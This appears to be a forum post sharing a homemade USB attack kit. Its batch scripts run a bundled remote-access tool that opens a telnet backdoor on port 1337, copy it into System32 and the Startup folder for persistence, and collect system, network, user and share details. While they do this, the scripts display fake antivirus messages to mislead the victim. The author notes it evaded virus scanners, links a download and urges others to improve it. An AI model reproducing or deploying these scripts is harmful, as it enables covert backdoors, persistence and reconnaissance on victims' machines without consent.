Programs used
Notepad to write batch scripts
WindowsRAT.exe to open port 1337
IExpress to make the file and command(windowsrat.exe 1337) run in background
http://virusscan.jotti.org/en/scanresult/5...ce1299d7fa9507e
http://www.virustotal.com/analisis/120844c...366e-1245102553
not detected.
this is just a basic thing.
autorun.bat this will start when you plug in the usb drive (there is a autorun.inf on it but if computer has autorun disabled this is the file you should start)
@echo off
start /min launch.exe
cls
start /min launch.bat
cls
exit
launch.exe has windowsrat.exe ( i did not write this i downloaded this from somewhere i think its from packet storm ) i used iexpress and put windowsrat.exe in it and it will run in background, the command windowsrat.exe 1337 is executed server is on port 1337 now you can connect to it using telnet.
launch.bat this will be minimized but just incase someone opens the window it will have false messages. this you can see puts launch.exe in system32 and copies startupsystem.bat to users startup folder. this also collects ip address and then you can telnet to that ip address and port 1337
echo off
copy launch.exe C:\Windows\System32
cls
copy startupsystem.bat "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup"
cls
mkdir \Information\%USERNAME%
cls
Echo Anti-Virus Portable
systeminfo > \Information\%USERNAME%\%USERNAME%sysinfo.txt
cls
Echo Anti-Virus Portable
arp -a > \Information\%USERNAME%\%USERNAME%arp.txt
cls
Echo Searching and Removing Virus
netstat -a > \Information\%USERNAME%\%USERNAME%netstat.txt
cls
Echo Searching and Removing Virus
ipconfig > \Information\%USERNAME%\%USERNAME%ipconfig.txt
cls
Echo Searching and Removing Virus
tasklist > \Information\%USERNAME%\%USERNAME%task.txt
cls
Echo Searching and Removing Virus
net group > \Information\%USERNAME%\%USERNAME%group.txt
cls
Echo Searching and Removing Virus
net localgroup > \Information\%USERNAME%\%USERNAME%localgroup.txt
cls
Echo Searching and Removing Virus
net share > \Information\%USERNAME%\%USERNAME%share.txt
cls
Echo Searching and Removing Virus
net use > \Information\%USERNAME%\%USERNAME%use.txt
cls
Echo Searching and Removing Virus
net user > \Information\%USERNAME%\%USERNAME%users.txt
cls
Echo No Virus Found
net view > \Information\%USERNAME%\%USERNAME%view.txt
Echo No Virus Found
cls
exit
startupsystem.bat this will start launch.exe when computer startups and this user logs in i tried to make it a service but i couldnt...if you can you should do that.
start launch.exe
exit
removal.bat it deletes launch.exe from sys32 and deletes startupsystem.bat...
@echo off
del "C:\Windows\System32\Launch.exe"
cls
del "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\startupsystem.bat"
cls
exit
you should have autorun disabled. and monitor your startup folder i think some anti spyware do it but its good if you check it.
i am not a coder, but if you are you can improve this..DO IT.
Download: http://www.2shared.com/file/6329193/806de49d/USBHACK.html
-Pizza (aka JPizza)
